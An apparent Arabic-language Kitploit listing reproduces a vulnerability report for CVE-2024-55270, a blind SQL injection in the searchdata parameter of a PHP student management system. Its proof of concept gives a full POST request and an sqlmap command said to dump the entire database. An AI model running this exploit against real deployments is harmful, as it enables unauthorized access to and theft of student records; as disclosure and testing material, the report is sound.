Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-55270 — نظام إدارة الطلاب باستخدام PHP وMySQL | Kitploit
أدوات/GitHubGitHub/shoaibalam112/cve-2024-55270
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقالتعلم والتعليم
GitHubshoaibalam112/cve-2024-55270

CVE-2024-55270

نظام إدارة الطلاب باستخدام PHP وMySQL

عرض المستودع
منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

نظام إدارة الطلاب 1.0 (CVE-2024-55270)

نظرة عامة

نظام إدارة الطلاب (SMS) هو تطبيق ويب تم تطويره باستخدام PHP وMySQL لإدارة معلومات الطلاب. يحتوي هذا المستودع على الكود المصدري وتفاصيل النظام، بالإضافة إلى تقرير ثغرة أمنية.

المدقق:
شعيب علام - ملف لينكد إن


تقرير الثغرة الأمنية

الوصف

تم اكتشاف ثغرة حقن SQL أعمى في نظام إدارة الطلاب. تؤثر هذه المشكلة على المعامل searchdata في وظيفة البحث في التطبيق.

  • النقطة الضعيفة: /studentms/admin/search.php
  • المعامل الضعيف: searchdata

المعامل searchdata عرضة لحقن SQL الأعمى بسبب عدم تنقية المدخلات بشكل كافٍ. قد يستغل المهاجم هذه الثغرة عن طريق حقن استعلامات SQL ضارة في إدخال searchdata، مما قد يسمح له بالوصول غير المصرح به إلى قاعدة البيانات أو معلومات حساسة أخرى.

إثبات المفهوم (PoC)

عنوان URL الضعيف

/studentms/admin/search.php

مثال لطلب POST

root@kitploit:~
POST /studentms/admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 64
Origin: http://localhost
DNT: 1
Sec-GPC: 1
Connection: keep-alive
Referer: http://localhost/studentms/admin/search.php
Cookie: PHPSESSID=kq90r1jv25kn4flrqd74v1miqd
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

searchdata=*&search=
  1. احفظ طلب POST أعلاه في ملف req.txt باستخدام المفكرة أو أي محرر نصوص.

  2. استخدم أداة مثل SQLMAP لاستغلال ما سبق بتطبيق الأمر التالي (يمكنك تخصيصه): sqlmap -r req.txt --dbs --random-agent --level 3 --risk 3

سيقوم الأمر أعلاه بتفريغ قاعدة البيانات بأكملها لتطبيق الويب.

تنزيل الأداة